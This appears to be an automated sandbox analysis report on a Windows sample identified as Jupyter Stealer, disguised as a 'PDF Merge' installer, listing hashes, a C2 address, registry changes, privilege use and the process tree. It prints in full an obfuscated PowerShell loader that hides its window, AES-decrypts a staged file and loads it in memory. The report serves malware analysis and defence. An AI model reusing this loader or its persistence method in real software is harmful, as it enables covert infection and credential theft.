Resubmissions
01-09-2022 19:57
220901-ypp62scdh3 1013-06-2022 01:36
220613-b1kpdahbh9 1014-03-2022 23:17
220314-29pmssdeh2 8Analysis
-
max time kernel
304s -
max time network
316s -
platform
windows10_x64 -
resource
win10-20220414-en -
submitted
13-06-2022 01:36
Static task
static1
General
-
Target
11543f09c416237d92090cebbefafdb2f03cec72a6f3fdedf8afe3c315181b5a.exe
-
Size
256.0MB
-
MD5
0fa1be2db15ef78a9e01b21589204615
-
SHA1
933ad2d5ce1e31654a201b284abfc6ec88ad484c
-
SHA256
11543f09c416237d92090cebbefafdb2f03cec72a6f3fdedf8afe3c315181b5a
-
SHA512
13e51c96c51741348fa07d9072a686fc62d3f31af5d085893bce7247cd7de98d89e7d4318e69e7f4c3c3aa29ae41c9d6b1f98f73aab062dffbc7704a76e91be4
Malware Config
Extracted
jupyter
http://146.70.53.153
Signatures
-
suricata: ET MALWARE Jupyter Stealer CnC Checkin
suricata: ET MALWARE Jupyter Stealer CnC Checkin
-
Executes dropped EXE 2 IoCs
pid Process 2200 rkrwpfnv.exe 4520 rkrwpfnv.exe -
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\auLFERWWOrJvttOesVUgKutjW.lnk 11543f09c416237d92090cebbefafdb2f03cec72a6f3fdedf8afe3c315181b5a.exe -
Loads dropped DLL 13 IoCs
pid Process 2200 rkrwpfnv.exe 2200 rkrwpfnv.exe 3620 MsiExec.exe 3620 MsiExec.exe 3620 MsiExec.exe 3620 MsiExec.exe 4792 MsiExec.exe 4792 MsiExec.exe 4792 MsiExec.exe 4792 MsiExec.exe 4792 MsiExec.exe 2200 rkrwpfnv.exe 2200 rkrwpfnv.exe -
Enumerates connected drives 3 TTPs 64 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\G: rkrwpfnv.exe File opened (read-only) \??\I: rkrwpfnv.exe File opened (read-only) \??\T: rkrwpfnv.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\M: rkrwpfnv.exe File opened (read-only) \??\J: rkrwpfnv.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\E: rkrwpfnv.exe File opened (read-only) \??\L: rkrwpfnv.exe File opened (read-only) \??\G: rkrwpfnv.exe File opened (read-only) \??\R: rkrwpfnv.exe File opened (read-only) \??\A: rkrwpfnv.exe File opened (read-only) \??\K: rkrwpfnv.exe File opened (read-only) \??\N: rkrwpfnv.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\W: rkrwpfnv.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\P: rkrwpfnv.exe File opened (read-only) \??\S: rkrwpfnv.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\Z: rkrwpfnv.exe File opened (read-only) \??\U: rkrwpfnv.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\B: rkrwpfnv.exe File opened (read-only) \??\X: rkrwpfnv.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\K: rkrwpfnv.exe File opened (read-only) \??\X: rkrwpfnv.exe File opened (read-only) \??\R: rkrwpfnv.exe File opened (read-only) \??\U: rkrwpfnv.exe File opened (read-only) \??\Y: rkrwpfnv.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\O: rkrwpfnv.exe File opened (read-only) \??\P: rkrwpfnv.exe File opened (read-only) \??\N: rkrwpfnv.exe File opened (read-only) \??\Q: rkrwpfnv.exe File opened (read-only) \??\H: rkrwpfnv.exe File opened (read-only) \??\W: rkrwpfnv.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\H: rkrwpfnv.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\E: rkrwpfnv.exe File opened (read-only) \??\V: rkrwpfnv.exe File opened (read-only) \??\F: rkrwpfnv.exe File opened (read-only) \??\I: rkrwpfnv.exe File opened (read-only) \??\V: rkrwpfnv.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\J: rkrwpfnv.exe File opened (read-only) \??\L: rkrwpfnv.exe File opened (read-only) \??\A: rkrwpfnv.exe File opened (read-only) \??\B: rkrwpfnv.exe File opened (read-only) \??\M: rkrwpfnv.exe File opened (read-only) \??\O: rkrwpfnv.exe -
Drops file in Program Files directory 2 IoCs
description ioc Process File created C:\Program Files (x86)\Free PDF Soulutions\PDF Merge\PdfMerge.exe msiexec.exe File created C:\Program Files (x86)\Free PDF Soulutions\PDF Merge\Uninstall.lnk msiexec.exe -
Drops file in Windows directory 15 IoCs
description ioc Process File opened for modification C:\Windows\Installer\e590df0.msi msiexec.exe File opened for modification C:\Windows\Installer\MSI14A8.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI1797.tmp msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File created C:\Windows\Installer\{50217A00-46B2-40E3-8664-5C93BFFA03B0}\SystemFoldermsiexec.exe msiexec.exe File created C:\Windows\Installer\e590df2.msi msiexec.exe File opened for modification C:\Windows\Installer\MSIF58.tmp msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File created C:\Windows\Installer\SourceHash{50217A00-46B2-40E3-8664-5C93BFFA03B0} msiexec.exe File opened for modification C:\Windows\Installer\MSI3207.tmp msiexec.exe File opened for modification C:\Windows\Installer\{50217A00-46B2-40E3-8664-5C93BFFA03B0}\SystemFoldermsiexec.exe msiexec.exe File created C:\Windows\Installer\e590df0.msi msiexec.exe File opened for modification C:\Windows\Installer\MSI3198.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI3351.tmp msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Modifies data under HKEY_USERS 3 IoCs
description ioc Process Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\1E\52C64B7E msiexec.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1f msiexec.exe -
Modifies registry class 30 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\00A712052B643E046846C539FBAF300B msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\00A712052B643E046846C539FBAF300B\Version = "16777216" msiexec.exe Key created \REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000_Classes\cllpwabyjcszqwhgvnmfablpnpnojb\shell 11543f09c416237d92090cebbefafdb2f03cec72a6f3fdedf8afe3c315181b5a.exe Key created \REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000_Classes\.ohxcapgkxbhyexhdtyykpowwi 11543f09c416237d92090cebbefafdb2f03cec72a6f3fdedf8afe3c315181b5a.exe Set value (str) \REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000_Classes\.ohxcapgkxbhyexhdtyykpowwi\ = "cllpwabyjcszqwhgvnmfablpnpnojb" 11543f09c416237d92090cebbefafdb2f03cec72a6f3fdedf8afe3c315181b5a.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\00A712052B643E046846C539FBAF300B\SourceList\Net msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\00A712052B643E046846C539FBAF300B\Assignment = "1" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\F4F0CA507A84F414BAC0C1BAD6DB30E5 msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\00A712052B643E046846C539FBAF300B\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Roaming\\Free PDF Soulutions\\PDF Merge 1.0.0\\install\\FFA03B0\\" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\00A712052B643E046846C539FBAF300B\SourceList\Media msiexec.exe Key created \REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000_Classes\cllpwabyjcszqwhgvnmfablpnpnojb\shell\open 11543f09c416237d92090cebbefafdb2f03cec72a6f3fdedf8afe3c315181b5a.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\00A712052B643E046846C539FBAF300B\SourceList msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\00A712052B643E046846C539FBAF300B\AdvertiseFlags = "388" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\00A712052B643E046846C539FBAF300B\AuthorizedLUAApp = "0" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\00A712052B643E046846C539FBAF300B\DeploymentFlags = "3" msiexec.exe Key created \REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000_Classes\cllpwabyjcszqwhgvnmfablpnpnojb 11543f09c416237d92090cebbefafdb2f03cec72a6f3fdedf8afe3c315181b5a.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\00A712052B643E046846C539FBAF300B\MainFeature msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\00A712052B643E046846C539FBAF300B msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\00A712052B643E046846C539FBAF300B\ProductName = "PDF Merge" msiexec.exe Key created \REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000_Classes\cllpwabyjcszqwhgvnmfablpnpnojb\shell\open\command 11543f09c416237d92090cebbefafdb2f03cec72a6f3fdedf8afe3c315181b5a.exe Set value (str) \REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000_Classes\cllpwabyjcszqwhgvnmfablpnpnojb\shell\open\command\ = "powershell -command \"$showWindowAsync=Add-Type -MemberDefinition ('['+'D'.ToUpper()+'ll'.ToLower()+'I'.ToUpper()+'mport('.ToLower()+[char]0x22+'user32.dll'.ToLower()+[char]0x22+')]public static extern bool '.ToLower()+'S'.ToUpper()+'how'.ToLower()+'W'.ToUpper()+'indow'.ToLower()+'A'.ToUpper()+'sync('.ToLower()+'I'.ToUpper()+'nt'.ToLower()+'P'.ToUpper()+'tr hWnd, int nCmdShow);'.ToLower()) -Name ('W'.ToUpper()+'in32'.ToLower()+'S'.ToUpper()+'how'.ToLower()+'W'.ToUpper()+'indow'.ToLower()+'A'.ToUpper()+'sync'.ToLower()) -Namespace Win32Functions -PassThru;$showWindowAsync::ShowWindowAsync((Get-Process -Id $pid).MainWindowHandle, 0);$AC=New-Object System.Security.Cryptography.AesCryptoServiceProvider;$AC.Key=[Convert]::FromBase64String('kazO1yvy4lTDGClKjFyoFmLBxWJjCmZRIaspHISgMFQ=');$EB=[Convert]::FromBase64String([IO.File]::ReadAllText('C:\\Users\\Admin\\AppData\\Local\\Temp\\terKDyEAHpDqTsLH\\aJzMMzlqkAgsbfrHpQwkpfcWZVWU.oHXCaPgKXBHyExHDtyyKPoWwi'));$AC.IV = $EB[0..15];$Decryptor=$AC.CreateDecryptor();$UB=$Decryptor.TransformFinalBlock($EB, 16, $EB.Length-16);$AC.Dispose();[Reflection.Assembly]::Load($UB);[ptT0HGWGyzqwKlTvqe.rDHifV7JMF4NnZ7K]::k0skBDu2A0m1W1RCxxG();\"" 11543f09c416237d92090cebbefafdb2f03cec72a6f3fdedf8afe3c315181b5a.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\00A712052B643E046846C539FBAF300B\InstanceType = "0" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\00A712052B643E046846C539FBAF300B\SourceList\Media\1 = ";" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\00A712052B643E046846C539FBAF300B\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Roaming\\Free PDF Soulutions\\PDF Merge 1.0.0\\install\\FFA03B0\\" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\00A712052B643E046846C539FBAF300B\PackageCode = "01766D08FC959764791E3F5AB682B7F8" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\00A712052B643E046846C539FBAF300B\Language = "1033" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\00A712052B643E046846C539FBAF300B\SourceList\Media\DiskPrompt = "[1]" msiexec.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\00A712052B643E046846C539FBAF300B\Clients = 3a0000000000 msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\F4F0CA507A84F414BAC0C1BAD6DB30E5\00A712052B643E046846C539FBAF300B msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\00A712052B643E046846C539FBAF300B\SourceList\PackageName = "setup.msi" msiexec.exe -
Suspicious behavior: EnumeratesProcesses 10 IoCs
pid Process 2396 11543f09c416237d92090cebbefafdb2f03cec72a6f3fdedf8afe3c315181b5a.exe 2396 11543f09c416237d92090cebbefafdb2f03cec72a6f3fdedf8afe3c315181b5a.exe 2396 11543f09c416237d92090cebbefafdb2f03cec72a6f3fdedf8afe3c315181b5a.exe 2396 11543f09c416237d92090cebbefafdb2f03cec72a6f3fdedf8afe3c315181b5a.exe 2396 11543f09c416237d92090cebbefafdb2f03cec72a6f3fdedf8afe3c315181b5a.exe 2396 11543f09c416237d92090cebbefafdb2f03cec72a6f3fdedf8afe3c315181b5a.exe 2396 11543f09c416237d92090cebbefafdb2f03cec72a6f3fdedf8afe3c315181b5a.exe 2396 11543f09c416237d92090cebbefafdb2f03cec72a6f3fdedf8afe3c315181b5a.exe 3144 msiexec.exe 3144 msiexec.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeCreateTokenPrivilege 2200 rkrwpfnv.exe Token: SeAssignPrimaryTokenPrivilege 2200 rkrwpfnv.exe Token: SeLockMemoryPrivilege 2200 rkrwpfnv.exe Token: SeIncreaseQuotaPrivilege 2200 rkrwpfnv.exe Token: SeMachineAccountPrivilege 2200 rkrwpfnv.exe Token: SeTcbPrivilege 2200 rkrwpfnv.exe Token: SeSecurityPrivilege 2200 rkrwpfnv.exe Token: SeTakeOwnershipPrivilege 2200 rkrwpfnv.exe Token: SeLoadDriverPrivilege 2200 rkrwpfnv.exe Token: SeSystemProfilePrivilege 2200 rkrwpfnv.exe Token: SeSystemtimePrivilege 2200 rkrwpfnv.exe Token: SeProfSingleProcessPrivilege 2200 rkrwpfnv.exe Token: SeIncBasePriorityPrivilege 2200 rkrwpfnv.exe Token: SeCreatePagefilePrivilege 2200 rkrwpfnv.exe Token: SeCreatePermanentPrivilege 2200 rkrwpfnv.exe Token: SeBackupPrivilege 2200 rkrwpfnv.exe Token: SeRestorePrivilege 2200 rkrwpfnv.exe Token: SeShutdownPrivilege 2200 rkrwpfnv.exe Token: SeDebugPrivilege 2200 rkrwpfnv.exe Token: SeAuditPrivilege 2200 rkrwpfnv.exe Token: SeSystemEnvironmentPrivilege 2200 rkrwpfnv.exe Token: SeChangeNotifyPrivilege 2200 rkrwpfnv.exe Token: SeRemoteShutdownPrivilege 2200 rkrwpfnv.exe Token: SeUndockPrivilege 2200 rkrwpfnv.exe Token: SeSyncAgentPrivilege 2200 rkrwpfnv.exe Token: SeEnableDelegationPrivilege 2200 rkrwpfnv.exe Token: SeManageVolumePrivilege 2200 rkrwpfnv.exe Token: SeImpersonatePrivilege 2200 rkrwpfnv.exe Token: SeCreateGlobalPrivilege 2200 rkrwpfnv.exe Token: SeSecurityPrivilege 3144 msiexec.exe Token: SeCreateTokenPrivilege 2200 rkrwpfnv.exe Token: SeAssignPrimaryTokenPrivilege 2200 rkrwpfnv.exe Token: SeLockMemoryPrivilege 2200 rkrwpfnv.exe Token: SeIncreaseQuotaPrivilege 2200 rkrwpfnv.exe Token: SeMachineAccountPrivilege 2200 rkrwpfnv.exe Token: SeTcbPrivilege 2200 rkrwpfnv.exe Token: SeSecurityPrivilege 2200 rkrwpfnv.exe Token: SeTakeOwnershipPrivilege 2200 rkrwpfnv.exe Token: SeLoadDriverPrivilege 2200 rkrwpfnv.exe Token: SeSystemProfilePrivilege 2200 rkrwpfnv.exe Token: SeSystemtimePrivilege 2200 rkrwpfnv.exe Token: SeProfSingleProcessPrivilege 2200 rkrwpfnv.exe Token: SeIncBasePriorityPrivilege 2200 rkrwpfnv.exe Token: SeCreatePagefilePrivilege 2200 rkrwpfnv.exe Token: SeCreatePermanentPrivilege 2200 rkrwpfnv.exe Token: SeBackupPrivilege 2200 rkrwpfnv.exe Token: SeRestorePrivilege 2200 rkrwpfnv.exe Token: SeShutdownPrivilege 2200 rkrwpfnv.exe Token: SeDebugPrivilege 2200 rkrwpfnv.exe Token: SeAuditPrivilege 2200 rkrwpfnv.exe Token: SeSystemEnvironmentPrivilege 2200 rkrwpfnv.exe Token: SeChangeNotifyPrivilege 2200 rkrwpfnv.exe Token: SeRemoteShutdownPrivilege 2200 rkrwpfnv.exe Token: SeUndockPrivilege 2200 rkrwpfnv.exe Token: SeSyncAgentPrivilege 2200 rkrwpfnv.exe Token: SeEnableDelegationPrivilege 2200 rkrwpfnv.exe Token: SeManageVolumePrivilege 2200 rkrwpfnv.exe Token: SeImpersonatePrivilege 2200 rkrwpfnv.exe Token: SeCreateGlobalPrivilege 2200 rkrwpfnv.exe Token: SeCreateTokenPrivilege 4520 rkrwpfnv.exe Token: SeAssignPrimaryTokenPrivilege 4520 rkrwpfnv.exe Token: SeLockMemoryPrivilege 4520 rkrwpfnv.exe Token: SeIncreaseQuotaPrivilege 4520 rkrwpfnv.exe Token: SeMachineAccountPrivilege 4520 rkrwpfnv.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
pid Process 2200 rkrwpfnv.exe 2200 rkrwpfnv.exe -
Suspicious use of WriteProcessMemory 20 IoCs
description pid Process procid_target PID 4452 wrote to memory of 2200 4452 11543f09c416237d92090cebbefafdb2f03cec72a6f3fdedf8afe3c315181b5a.exe 68 PID 4452 wrote to memory of 2200 4452 11543f09c416237d92090cebbefafdb2f03cec72a6f3fdedf8afe3c315181b5a.exe 68 PID 4452 wrote to memory of 2200 4452 11543f09c416237d92090cebbefafdb2f03cec72a6f3fdedf8afe3c315181b5a.exe 68 PID 4452 wrote to memory of 2396 4452 11543f09c416237d92090cebbefafdb2f03cec72a6f3fdedf8afe3c315181b5a.exe 69 PID 4452 wrote to memory of 2396 4452 11543f09c416237d92090cebbefafdb2f03cec72a6f3fdedf8afe3c315181b5a.exe 69 PID 3144 wrote to memory of 3620 3144 msiexec.exe 72 PID 3144 wrote to memory of 3620 3144 msiexec.exe 72 PID 3144 wrote to memory of 3620 3144 msiexec.exe 72 PID 2200 wrote to memory of 4520 2200 rkrwpfnv.exe 73 PID 2200 wrote to memory of 4520 2200 rkrwpfnv.exe 73 PID 2200 wrote to memory of 4520 2200 rkrwpfnv.exe 73 PID 2396 wrote to memory of 1436 2396 11543f09c416237d92090cebbefafdb2f03cec72a6f3fdedf8afe3c315181b5a.exe 76 PID 2396 wrote to memory of 1436 2396 11543f09c416237d92090cebbefafdb2f03cec72a6f3fdedf8afe3c315181b5a.exe 76 PID 1436 wrote to memory of 828 1436 csc.exe 78 PID 1436 wrote to memory of 828 1436 csc.exe 78 PID 3144 wrote to memory of 4796 3144 msiexec.exe 80 PID 3144 wrote to memory of 4796 3144 msiexec.exe 80 PID 3144 wrote to memory of 4792 3144 msiexec.exe 82 PID 3144 wrote to memory of 4792 3144 msiexec.exe 82 PID 3144 wrote to memory of 4792 3144 msiexec.exe 82
Processes
-
C:\Users\Admin\AppData\Local\Temp\11543f09c416237d92090cebbefafdb2f03cec72a6f3fdedf8afe3c315181b5a.exe"C:\Users\Admin\AppData\Local\Temp\11543f09c416237d92090cebbefafdb2f03cec72a6f3fdedf8afe3c315181b5a.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:4452 -
C:\Users\Admin\AppData\Local\Temp\rkrwpfnv.exe"C:\Users\Admin\AppData\Local\Temp\rkrwpfnv.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2200 -
C:\Users\Admin\AppData\Local\Temp\rkrwpfnv.exe"C:\Users\Admin\AppData\Local\Temp\rkrwpfnv.exe" /i "C:\Users\Admin\AppData\Roaming\Free PDF Soulutions\PDF Merge 1.0.0\install\FFA03B0\setup.msi" EXECUTEACTION="INSTALL" SECONDSEQUENCE="1" CLIENTPROCESSID="2200" ADDLOCAL="MainFeature" ACTION="INSTALL" CLIENTUILEVEL="0" PRIMARYFOLDER="APPDIR" ROOTDRIVE="C:\" EXE_CMD_LINE="/exenoupdates /exelang 0 /noprereqs " AI_SETUPEXEPATH="C:\Users\Admin\AppData\Local\Temp\rkrwpfnv.exe" SETUPEXEDIR="C:\Users\Admin\AppData\Local\Temp\" AI_DOTNET40_SEARCH="#1" TARGETDIR="C:\" APPDIR="C:\Program Files (x86)\Free PDF Soulutions\PDF Merge\" SHORTCUTDIR="C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PDF Merge"3⤵
- Executes dropped EXE
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
PID:4520
-
-
-
C:\Users\Admin\AppData\Local\Temp\11543f09c416237d92090cebbefafdb2f03cec72a6f3fdedf8afe3c315181b5a.exe"C:\Users\Admin\AppData\Local\Temp\11543f09c416237d92090cebbefafdb2f03cec72a6f3fdedf8afe3c315181b5a.exe" /i2⤵
- Drops startup file
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2396 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\aa2t00ab\aa2t00ab.cmdline"3⤵
- Suspicious use of WriteProcessMemory
PID:1436 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA786.tmp" "c:\Users\Admin\AppData\Local\Temp\aa2t00ab\CSC9FD8FD04F61744318C26C14F7C4CF56.TMP"4⤵PID:828
-
-
-
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3144 -
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding AD67E3DF2A3C3856B7D6B22B5D34639B C2⤵
- Loads dropped DLL
PID:3620
-
-
C:\Windows\system32\srtasks.exeC:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:22⤵PID:4796
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 4E08EE568FF03E93C9A8DE2F3B9DBDDE2⤵
- Loads dropped DLL
PID:4792
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵PID:372
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
69KB
MD530e6c05c794e912b8f57f9c6e9449afc
SHA128a2bd4b61fafa633adad1ad0a7c8ceeaec48675
SHA2565d3b2f3f1b00855aac7b95a585fa12ee532f59e06bb035efc8a20f30bfbf047d
SHA5126da0d628caf6d540b8297fa9f8e7ed413c8a5a29da113d2371f3d931eebfa543842a90661e87a4517db28aca2eae429b476c540127e6ad046d31168249357d22
-
Filesize
69KB
MD530e6c05c794e912b8f57f9c6e9449afc
SHA128a2bd4b61fafa633adad1ad0a7c8ceeaec48675
SHA2565d3b2f3f1b00855aac7b95a585fa12ee532f59e06bb035efc8a20f30bfbf047d
SHA5126da0d628caf6d540b8297fa9f8e7ed413c8a5a29da113d2371f3d931eebfa543842a90661e87a4517db28aca2eae429b476c540127e6ad046d31168249357d22
-
Filesize
266KB
MD575515f449d49e8f431a5cf109c603680
SHA10a32e62b50d3589cd25441ac2e463a695367da7f
SHA256a0ff99c90d262e4f242b680b377dc93c6ee4fa7dd9041e7865709f3aaa1e1017
SHA5128473aeb3853a0ec22a54398099b81a443bf56187257f2ca6b25f72a9ea4371cbedb671c49849d944e08849120a53e9456c2b697d3b4fdc911079e7543c2ff9c4
-
Filesize
69KB
MD530e6c05c794e912b8f57f9c6e9449afc
SHA128a2bd4b61fafa633adad1ad0a7c8ceeaec48675
SHA2565d3b2f3f1b00855aac7b95a585fa12ee532f59e06bb035efc8a20f30bfbf047d
SHA5126da0d628caf6d540b8297fa9f8e7ed413c8a5a29da113d2371f3d931eebfa543842a90661e87a4517db28aca2eae429b476c540127e6ad046d31168249357d22
-
Filesize
1KB
MD5e69a5f9da26b00fdfc5978bb2d34adac
SHA19d7426da0eb824ac3a3733e394b4c0a7a7b67ce1
SHA256927a76dd878d79e6d4a94da78d2271c49820d6525e2f9bf6cdabba914fafb5f3
SHA512568e6ca9d2ba8ac20d076bdde3567c54b8491a3172232ea2aa6826807bbdb204c7e09fafa8f4cf47b2e01a2490a6ccbb07bc36bfceb2fa04a1363455e49718df
-
Filesize
3KB
MD5131073a9f949e3222ab9ccfb7d133933
SHA1d9828680039572073578db709fef9e3266e3d856
SHA2562aab1780538ab9bcff415dfc8cb3f19be89fb2fca152a58a011d39405488280d
SHA51243921f21480282d306432d3d7a46f8cf1ab5aeba40aaf51cc0fb58125aa5e8f922ecd4aeaaa826fe2ce51b17a0b34b8ed277a0480aa746154b7b7a06e6e88916
-
Filesize
4.2MB
MD50dae793f4d81ad44e9381ec8e017425f
SHA12908846d8d17393e4ae9a620ff6e80d039b8c4ce
SHA2564f043b71d369c994a4911667829e0c7b639cd4c9929808ea6233800f21922336
SHA5128df514c3009493295f70480da58decc31ab882433646843d5c3103c9a237cd1cc8d9cd64544f545adc3cd8de3c785a1cb3edc843f508357859db30f24182cda7
-
Filesize
4.2MB
MD50dae793f4d81ad44e9381ec8e017425f
SHA12908846d8d17393e4ae9a620ff6e80d039b8c4ce
SHA2564f043b71d369c994a4911667829e0c7b639cd4c9929808ea6233800f21922336
SHA5128df514c3009493295f70480da58decc31ab882433646843d5c3103c9a237cd1cc8d9cd64544f545adc3cd8de3c785a1cb3edc843f508357859db30f24182cda7
-
Filesize
4.2MB
MD50dae793f4d81ad44e9381ec8e017425f
SHA12908846d8d17393e4ae9a620ff6e80d039b8c4ce
SHA2564f043b71d369c994a4911667829e0c7b639cd4c9929808ea6233800f21922336
SHA5128df514c3009493295f70480da58decc31ab882433646843d5c3103c9a237cd1cc8d9cd64544f545adc3cd8de3c785a1cb3edc843f508357859db30f24182cda7
-
Filesize
6.9MB
MD5f5b1bad514f3638f65bbe6765ba5af65
SHA1ad8ef8255e2c885217986e0785c4fdfb0f84765e
SHA2567c38e4644c3d457703b99ce6f7d71a6d8b3c499a4781b345cf2c9bc1411aaa70
SHA512107558c9efdda48d1da3e7b846a175a12ebf8f2608ecf35338fd92bd99b36ab5b46ec252543653c59ebd26f77ec80d0b0161fa4ce6f0934dcfbd299caaf5d2be
-
Filesize
841KB
MD5644dc18c44254707dd745ac018b9f6ae
SHA14a929d3d872eed25c63fdd0c818d71438f5d6958
SHA256a01f73799b6c72c39c784b97bc595bbd4719c2479040648e79cda2a45b10b07a
SHA512c4eee994ddc11ee1a7a359bb9b78e180496cddc61595ebab263d3d377bf6fd1aa792fb98bc46b88d8a8d2cf1a380117493b7c47ccccd73fb0c8f064b362caf93
-
Filesize
69KB
MD530e6c05c794e912b8f57f9c6e9449afc
SHA128a2bd4b61fafa633adad1ad0a7c8ceeaec48675
SHA2565d3b2f3f1b00855aac7b95a585fa12ee532f59e06bb035efc8a20f30bfbf047d
SHA5126da0d628caf6d540b8297fa9f8e7ed413c8a5a29da113d2371f3d931eebfa543842a90661e87a4517db28aca2eae429b476c540127e6ad046d31168249357d22
-
Filesize
266KB
MD575515f449d49e8f431a5cf109c603680
SHA10a32e62b50d3589cd25441ac2e463a695367da7f
SHA256a0ff99c90d262e4f242b680b377dc93c6ee4fa7dd9041e7865709f3aaa1e1017
SHA5128473aeb3853a0ec22a54398099b81a443bf56187257f2ca6b25f72a9ea4371cbedb671c49849d944e08849120a53e9456c2b697d3b4fdc911079e7543c2ff9c4
-
Filesize
266KB
MD575515f449d49e8f431a5cf109c603680
SHA10a32e62b50d3589cd25441ac2e463a695367da7f
SHA256a0ff99c90d262e4f242b680b377dc93c6ee4fa7dd9041e7865709f3aaa1e1017
